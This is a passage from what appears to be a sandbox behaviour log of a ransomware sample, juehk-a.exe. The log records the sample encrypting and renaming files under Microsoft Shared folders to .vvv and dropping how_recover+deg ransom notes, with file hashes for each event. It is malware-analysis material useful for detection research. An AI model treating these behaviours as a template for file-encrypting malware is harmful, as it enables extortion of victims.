19551.          old_name: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\METCONV.TXT
19552.          new_name: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\METCONV.TXT.vvv
19553.            ads:
19554.          fid (ads:): 562949953501086
19555.          ntstatus: 0x0
19556.          CreateOptions: 0x0
19557.        file:
19558.          timestamp: 80188
19559.          mode: created
19560.          sequenceNumber: 1381
19561.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\how_recover+deg.txt
19562.          processinfo:
19563.            pid: 1648
19564.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19565.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19566.            ads:
19567.          fid (ads:): 562949953521268
19568.          ntstatus: 0x0
19569.          CreateOptions: 0x60
19570.        file:
19571.          timestamp: 80194
19572.          mode: close
19573.          sequenceNumber: 1382
19574.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\how_recover+deg.txt
19575.          filesize: 2673
19576.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19577.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19578.          processinfo:
19579.            pid: 1648
19580.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19581.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19582.            ads:
19583.          fid (ads:): 562949953521268
19584.          ntstatus: 0x0
19585.          CreateOptions: 0x0
19586.        file:
19587.          timestamp: 80199
19588.          mode: created
19589.          sequenceNumber: 1383
19590.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\how_recover+deg.html
19591.          processinfo:
19592.            pid: 1648
19593.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19595.            ads:
19596.          fid (ads:): 562949953521269
19597.          ntstatus: 0x0
19598.          CreateOptions: 0x60
19599.        file:
19600.          timestamp: 80209
19601.          mode: close
19602.          sequenceNumber: 1384
19603.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\how_recover+deg.html
19604.          filesize: 9480
19605.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19606.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19607.          processinfo:
19608.            pid: 1648
19609.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19610.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19611.            ads:
19612.          fid (ads:): 562949953521269
19613.          ntstatus: 0x0
19614.          CreateOptions: 0x0
19615.        file:
19616.          timestamp: 80215
19617.          mode: created
19618.          sequenceNumber: 1385
19619.          value: C:\Program Files\Common Files\Microsoft Shared\Source Engine\how_recover+deg.txt
19620.          processinfo:
19621.            pid: 1648
19622.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19623.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19624.            ads:
19625.          fid (ads:): 562949953521270
19626.          ntstatus: 0x0
19627.          CreateOptions: 0x60
19628.        file:
19629.          timestamp: 80220
19630.          mode: close
19631.          sequenceNumber: 1386
19632.          value: C:\Program Files\Common Files\Microsoft Shared\Source Engine\how_recover+deg.txt
19633.          filesize: 2673
19634.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19635.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19636.          processinfo:
19637.            pid: 1648
19638.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19639.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19640.            ads:
19641.          fid (ads:): 562949953521270
19642.          ntstatus: 0x0
19643.          CreateOptions: 0x0
19644.        file:
19645.          timestamp: 80276
19646.          mode: created
19647.          sequenceNumber: 1387
19648.          value: C:\Program Files\Common Files\Microsoft Shared\Source Engine\how_recover+deg.html
19649.          processinfo:
19650.            pid: 1648
19651.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19652.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19653.            ads:
19654.          fid (ads:): 562949953521271
19655.          ntstatus: 0x0
19656.          CreateOptions: 0x60
19657.        file:
19658.          timestamp: 80282
19659.          mode: close
19660.          sequenceNumber: 1388
19661.          value: C:\Program Files\Common Files\Microsoft Shared\Source Engine\how_recover+deg.html
19662.          filesize: 9480
19663.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19664.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19665.          processinfo:
19666.            pid: 1648
19667.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19668.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19669.            ads:
19670.          fid (ads:): 562949953521271
19671.          ntstatus: 0x0
19672.          CreateOptions: 0x0
19673.        file:
19674.          timestamp: 80307
19675.          mode: failed
19676.          sequenceNumber: 1389
19677.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg
19678.          processinfo:
19679.            pid: 1648
19680.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19681.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19682.            ads:
19683.          fid (ads:): 0
19684.          failure: open
19685.          ntstatus: 0xc0000022
19686.          CreateOptions: 0x60
19687.        file:
19688.          timestamp: 80313
19689.          mode: failed
19690.          sequenceNumber: 1390
19691.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg
19692.          processinfo:
19693.            pid: 1648
19694.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19695.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19696.            ads:
19697.          fid (ads:): 0
19698.          failure: open
19699.          ntstatus: 0xc0000022
19700.          CreateOptions: 0x60
19701.        file:
19702.          timestamp: 80320
19703.          mode: failed
19704.          sequenceNumber: 1391
19705.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg
19706.          processinfo:
19707.            pid: 1648
19708.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19709.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19710.            ads:
19711.          fid (ads:): 0
19712.          failure: open
19713.          ntstatus: 0xc0000022
19714.          CreateOptions: 0x60
19715.        file:
19716.          timestamp: 80342
19717.          mode: failed
19718.          sequenceNumber: 1392
19719.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg
19720.          processinfo:
19721.            pid: 1648
19722.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19723.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19724.            ads:
19725.          fid (ads:): 0
19726.          failure: open
19727.          ntstatus: 0xc0000022
19728.          CreateOptions: 0x60
19729.        file:
19730.          timestamp: 80348
19731.          mode: failed
19732.          sequenceNumber: 1393
19733.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg
19734.          processinfo:
19735.            pid: 1648
19736.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19737.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19738.            ads:
19739.          fid (ads:): 0
19740.          failure: open
19741.          ntstatus: 0xc0000022
19742.          CreateOptions: 0x60
19743.        file:
19744.          timestamp: 80375
19745.          mode: failed
19746.          sequenceNumber: 1394
19747.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg
19748.          processinfo:
19749.            pid: 1648
19750.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19751.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19752.            ads:
19753.          fid (ads:): 0
19754.          failure: open
19755.          ntstatus: 0xc0000022
19756.          CreateOptions: 0x60
19757.        file:
19758.          timestamp: 80380
19759.          mode: failed
19760.          sequenceNumber: 1395
19761.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg
19762.          processinfo:
19763.            pid: 1648
19764.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19765.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19766.            ads:
19767.          fid (ads:): 0
19768.          failure: open
19769.          ntstatus: 0xc0000022
19770.          CreateOptions: 0x60
19771.        file:
19772.          timestamp: 80385
19773.          mode: failed
19774.          sequenceNumber: 1396
19775.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg
19776.          processinfo:
19777.            pid: 1648
19778.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19779.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19780.            ads:
19781.          fid (ads:): 0
19782.          failure: open
19783.          ntstatus: 0xc0000022
19784.          CreateOptions: 0x60
19785.        file:
19786.          timestamp: 80391
19787.          mode: failed
19788.          sequenceNumber: 1397
19789.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg
19790.          processinfo:
19791.            pid: 1648
19792.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19793.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19794.            ads:
19795.          fid (ads:): 0
19796.          failure: open
19797.          ntstatus: 0xc0000022
19798.          CreateOptions: 0x60
19799.        file:
19800.          timestamp: 80396
19801.          mode: failed
19802.          sequenceNumber: 1398
19803.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg
19804.          processinfo:
19805.            pid: 1648
19806.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19807.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19808.            ads:
19809.          fid (ads:): 0
19810.          failure: open
19811.          ntstatus: 0xc0000022
19812.          CreateOptions: 0x60
19813.        file:
19814.          timestamp: 80401
19815.          mode: failed
19816.          sequenceNumber: 1399
19817.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg
19818.          processinfo:
19819.            pid: 1648
19820.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19821.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19822.            ads:
19823.          fid (ads:): 0
19824.          failure: open
19825.          ntstatus: 0xc0000022
19826.          CreateOptions: 0x60
19827.        file:
19828.          timestamp: 80407
19829.          mode: failed
19830.          sequenceNumber: 1400
19831.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg
19832.          processinfo:
19833.            pid: 1648
19834.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19835.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19836.            ads:
19837.          fid (ads:): 0
19838.          failure: open
19839.          ntstatus: 0xc0000022
19840.          CreateOptions: 0x60
19841.        file:
19842.          timestamp: 80412
19843.          mode: failed
19844.          sequenceNumber: 1401
19845.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg
19846.          processinfo:
19847.            pid: 1648
19848.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19849.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19850.            ads:
19851.          fid (ads:): 0
19852.          failure: open
19853.          ntstatus: 0xc0000022
19854.          CreateOptions: 0x60
19855.        file:
19856.          timestamp: 80418
19857.          mode: failed
19858.          sequenceNumber: 1402
19859.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg
19860.          processinfo:
19861.            pid: 1648
19862.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19863.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19864.            ads:
19865.          fid (ads:): 0
19866.          failure: open
19867.          ntstatus: 0xc0000022
19868.          CreateOptions: 0x60
19869.        file:
19870.          timestamp: 80424
19871.          mode: failed
19872.          sequenceNumber: 1403
19873.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg
19874.          processinfo:
19875.            pid: 1648
19876.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19877.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19878.            ads:
19879.          fid (ads:): 0
19880.          failure: open
19881.          ntstatus: 0xc0000022
19882.          CreateOptions: 0x60
19883.        file:
19884.          timestamp: 80429
19885.          mode: failed
19886.          sequenceNumber: 1404
19887.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg
19888.          processinfo:
19889.            pid: 1648
19890.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19891.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19892.            ads:
19893.          fid (ads:): 0
19894.          failure: open
19895.          ntstatus: 0xc0000022
19896.          CreateOptions: 0x60
19897.        file:
19898.          timestamp: 80435
19899.          mode: failed
19900.          sequenceNumber: 1405
19901.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg
19902.          processinfo:
19903.            pid: 1648
19904.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19905.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19906.            ads:
19907.          fid (ads:): 0
19908.          failure: open
19909.          ntstatus: 0xc0000022
19910.          CreateOptions: 0x60
19911.        file:
19912.          timestamp: 80440
19913.          mode: failed
19914.          sequenceNumber: 1406
19915.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg
19916.          processinfo:
19917.            pid: 1648
19918.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19919.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19920.            ads:
19921.          fid (ads:): 0
19922.          failure: open
19923.          ntstatus: 0xc0000022
19924.          CreateOptions: 0x60
19925.        file:
19926.          timestamp: 80445
19927.          mode: failed
19928.          sequenceNumber: 1407
19929.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg
19930.          processinfo:
19931.            pid: 1648
19932.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19933.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19934.            ads:
19935.          fid (ads:): 0
19936.          failure: open
19937.          ntstatus: 0xc0000022
19938.          CreateOptions: 0x60
19939.        file:
19940.          timestamp: 80452
19941.          mode: failed
19942.          sequenceNumber: 1408
19943.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg
19944.          processinfo:
19945.            pid: 1648
19946.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19947.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19948.            ads:
19949.          fid (ads:): 0
19950.          failure: open
19951.          ntstatus: 0xc0000022
19952.          CreateOptions: 0x60
19953.        file:
19954.          timestamp: 80457
19955.          mode: created
19956.          sequenceNumber: 1409
19957.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\how_recover+deg.txt
19958.          processinfo:
19959.            pid: 1648
19960.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19961.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19962.            ads:
19963.          fid (ads:): 562949953521272
19964.          ntstatus: 0x0
19965.          CreateOptions: 0x60
19966.        file:
19967.          timestamp: 80463
19968.          mode: close
19969.          sequenceNumber: 1410
19970.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\how_recover+deg.txt
19971.          filesize: 2673
19972.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19973.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19974.          processinfo:
19975.            pid: 1648
19976.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19977.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19978.            ads:
19979.          fid (ads:): 562949953521272
19980.          ntstatus: 0x0
19981.          CreateOptions: 0x0
19982.        file:
19983.          timestamp: 80478
19984.          mode: created
19985.          sequenceNumber: 1411
19986.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\how_recover+deg.html
19987.          processinfo:
19988.            pid: 1648
19989.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19990.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19991.            ads:
19992.          fid (ads:): 562949953521273
19993.          ntstatus: 0x0
19994.          CreateOptions: 0x60
19995.        file:
19996.          timestamp: 80482
19997.          mode: close
19998.          sequenceNumber: 1412
19999.          value: C:\Program Files\Common Files\Microsoft Shared\Stationery\how_recover+deg.html
20000.          filesize: 9480
20001.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20002.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20003.          processinfo:
20004.            pid: 1648
20005.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20006.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20007.            ads:
20008.          fid (ads:): 562949953521273
20009.          ntstatus: 0x0
20010.          CreateOptions: 0x0
20011.        file:
20012.          timestamp: 80487
20013.          mode: created
20014.          sequenceNumber: 1413
20015.          value: C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\how_recover+deg.txt
20016.          processinfo:
20017.            pid: 1648
20018.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20019.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20020.            ads:
20021.          fid (ads:): 562949953521274
20022.          ntstatus: 0x0
20023.          CreateOptions: 0x60
20024.        file:
20025.          timestamp: 80491
20026.          mode: close
20027.          sequenceNumber: 1414
20028.          value: C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\how_recover+deg.txt
20029.          filesize: 2673
20030.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20031.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20032.          processinfo:
20033.            pid: 1648
20034.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20035.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20036.            ads:
20037.          fid (ads:): 562949953521274
20038.          ntstatus: 0x0
20039.          CreateOptions: 0x0
20040.        file:
20041.          timestamp: 80496
20042.          mode: created
20043.          sequenceNumber: 1415
20044.          value: C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\how_recover+deg.html
20045.          processinfo:
20046.            pid: 1648
20047.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20048.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20049.            ads:
20050.          fid (ads:): 562949953521275
20051.          ntstatus: 0x0
20052.          CreateOptions: 0x60
20053.        file:
20054.          timestamp: 80500
20055.          mode: close
20056.          sequenceNumber: 1416
20057.          value: C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\how_recover+deg.html
20058.          filesize: 9480
20059.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20060.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20061.          processinfo:
20062.            pid: 1648
20063.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20064.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20065.            ads:
20066.          fid (ads:): 562949953521275
20067.          ntstatus: 0x0
20068.          CreateOptions: 0x0
20069.        apicall:
20070.          timestamp: 80538
20071.          repeat: 4000
20072.          sequenceNumber: 1417
20073.          processinfo:
20074.            pid: 1648
20075.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20076.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20077.          dllname: kernel32.dll
20078.          apiname: Sleep
20079.          address: 0x0041ed5b
20080.        file:
20081.          timestamp: 80567
20082.          mode: created
20083.          sequenceNumber: 1418
20084.          value: C:\Program Files\Common Files\Microsoft Shared\TextConv\how_recover+deg.txt
20085.          processinfo:
20086.            pid: 1648
20087.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20088.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20089.            ads:
20090.          fid (ads:): 562949953521276
20091.          ntstatus: 0x0
20092.          CreateOptions: 0x60
20093.        file:
20094.          timestamp: 80572
20095.          mode: close
20096.          sequenceNumber: 1419
20097.          value: C:\Program Files\Common Files\Microsoft Shared\TextConv\how_recover+deg.txt
20098.          filesize: 2673
20099.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20100.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20101.          processinfo:
20102.            pid: 1648
20103.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20104.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20105.            ads:
20106.          fid (ads:): 562949953521276
20107.          ntstatus: 0x0
20108.          CreateOptions: 0x0
20109.        file:
20110.          timestamp: 80578
20111.          mode: created
20112.          sequenceNumber: 1420
20113.          value: C:\Program Files\Common Files\Microsoft Shared\TextConv\how_recover+deg.html
20114.          processinfo:
20115.            pid: 1648
20116.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20117.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20118.            ads:
20119.          fid (ads:): 562949953521277
20120.          ntstatus: 0x0
20121.          CreateOptions: 0x60
20122.        file:
20123.          timestamp: 80582
20124.          mode: close
20125.          sequenceNumber: 1421
20126.          value: C:\Program Files\Common Files\Microsoft Shared\TextConv\how_recover+deg.html
20127.          filesize: 9480
20128.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20129.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20130.          processinfo:
20131.            pid: 1648
20132.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20133.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20134.            ads:
20135.          fid (ads:): 562949953521277
20136.          ntstatus: 0x0
20137.          CreateOptions: 0x0
20138.        file:
20139.          timestamp: 80833
20140.          mode: open
20141.          sequenceNumber: 1422
20142.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\THMBNAIL.PNG
20143.          filesize: 25234
20144.          processinfo:
20145.            pid: 1648
20146.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20147.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20148.            ads:
20149.          fid (ads:): 562949953499608
20150.          ntstatus: 0x0
20151.          CreateOptions: 0x60
20152.        file:
20153.          timestamp: 80961
20154.          mode: close
20155.          sequenceNumber: 1423
20156.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\THMBNAIL.PNG
20157.          filesize: 25662
20158.          md5sum: 936e908b9602e8e44c810820c1c3a753
20159.          sha1sum: 418e0f6859a731f4376388952b810d10d0e12f26
20160.          processinfo:
20161.            pid: 1648
20162.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20163.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20164.            ads:
20165.          fid (ads:): 562949953499608
20166.          ntstatus: 0x0
20167.          CreateOptions: 0x0
20168.        file:
20169.          timestamp: 80970
20170.          mode: rename
20171.          sequenceNumber: 1424
20172.          filesize: 25662
20173.          md5sum: 936e908b9602e8e44c810820c1c3a753
20174.          sha1sum: 418e0f6859a731f4376388952b810d10d0e12f26
20175.          processinfo:
20176.            pid: 1648
20177.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20178.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20179.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\THMBNAIL.PNG
20180.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\THMBNAIL.PNG.vvv
20181.            ads:
20182.          fid (ads:): 562949953499608
20183.          ntstatus: 0x0
20184.          CreateOptions: 0x0
20185.        file:
20186.          timestamp: 80993
20187.          mode: created
20188.          sequenceNumber: 1425
20189.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\how_recover+deg.txt
20190.          processinfo:
20191.            pid: 1648
20192.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20193.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20194.            ads:
20195.          fid (ads:): 562949953521278
20196.          ntstatus: 0x0
20197.          CreateOptions: 0x60
20198.        file:
20199.          timestamp: 80999
20200.          mode: close
20201.          sequenceNumber: 1426
20202.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\how_recover+deg.txt
20203.          filesize: 2673
20204.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20205.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20206.          processinfo:
20207.            pid: 1648
20208.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20209.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20210.            ads:
20211.          fid (ads:): 562949953521278
20212.          ntstatus: 0x0
20213.          CreateOptions: 0x0
20214.        file:
20215.          timestamp: 81007
20216.          mode: created
20217.          sequenceNumber: 1427
20218.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\how_recover+deg.html
20219.          processinfo:
20220.            pid: 1648
20221.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20222.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20223.            ads:
20224.          fid (ads:): 562949953521279
20225.          ntstatus: 0x0
20226.          CreateOptions: 0x60
20227.        file:
20228.          timestamp: 81015
20229.          mode: close
20230.          sequenceNumber: 1428
20231.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\how_recover+deg.html
20232.          filesize: 9480
20233.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20234.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20235.          processinfo:
20236.            pid: 1648
20237.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20238.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20239.            ads:
20240.          fid (ads:): 562949953521279
20241.          ntstatus: 0x0
20242.          CreateOptions: 0x0
20243.        file:
20244.          timestamp: 81023
20245.          mode: open
20246.          sequenceNumber: 1429
20247.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\THMBNAIL.PNG
20248.          filesize: 19780
20249.          processinfo:
20250.            pid: 1648
20251.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20252.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20253.            ads:
20254.          fid (ads:): 562949953499609
20255.          ntstatus: 0x0
20256.          CreateOptions: 0x60
20257.        file:
20258.          timestamp: 81302
20259.          mode: close
20260.          sequenceNumber: 1430
20261.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\THMBNAIL.PNG
20262.          filesize: 20206
20263.          md5sum: 5982bef985dee08932b20064a17c3832
20264.          sha1sum: eafe87450fc926aa6aaf9320e05c3d44e892233c
20265.          processinfo:
20266.            pid: 1648
20267.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20268.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20269.            ads:
20270.          fid (ads:): 562949953499609
20271.          ntstatus: 0x0
20272.          CreateOptions: 0x0
20273.        file:
20274.          timestamp: 81333
20275.          mode: rename
20276.          sequenceNumber: 1431
20277.          filesize: 20206
20278.          md5sum: 5982bef985dee08932b20064a17c3832
20279.          sha1sum: eafe87450fc926aa6aaf9320e05c3d44e892233c
20280.          processinfo:
20281.            pid: 1648
20282.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20283.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20284.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\THMBNAIL.PNG
20285.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\THMBNAIL.PNG.vvv
20286.            ads:
20287.          fid (ads:): 562949953499609
20288.          ntstatus: 0x0
20289.          CreateOptions: 0x0
20290.        file:
20291.          timestamp: 81487
20292.          mode: created
20293.          sequenceNumber: 1432
20294.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\how_recover+deg.txt
20295.          processinfo:
20296.            pid: 1648
20297.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20298.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20299.            ads:
20300.          fid (ads:): 844424930222253
20301.          ntstatus: 0x0
20302.          CreateOptions: 0x60
20303.        file:
20304.          timestamp: 81492
20305.          mode: close
20306.          sequenceNumber: 1433
20307.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\how_recover+deg.txt
20308.          filesize: 2673
20309.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20310.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20311.          processinfo:
20312.            pid: 1648
20313.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20314.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20315.            ads:
20316.          fid (ads:): 844424930222253
20317.          ntstatus: 0x0
20318.          CreateOptions: 0x0
20319.        file:
20320.          timestamp: 81505
20321.          mode: created
20322.          sequenceNumber: 1434
20323.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\how_recover+deg.html
20324.          processinfo:
20325.            pid: 1648
20326.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20327.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20328.            ads:
20329.          fid (ads:): 562949953521280
20330.          ntstatus: 0x0
20331.          CreateOptions: 0x60
20332.        file:
20333.          timestamp: 81510
20334.          mode: close
20335.          sequenceNumber: 1435
20336.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\how_recover+deg.html
20337.          filesize: 9480
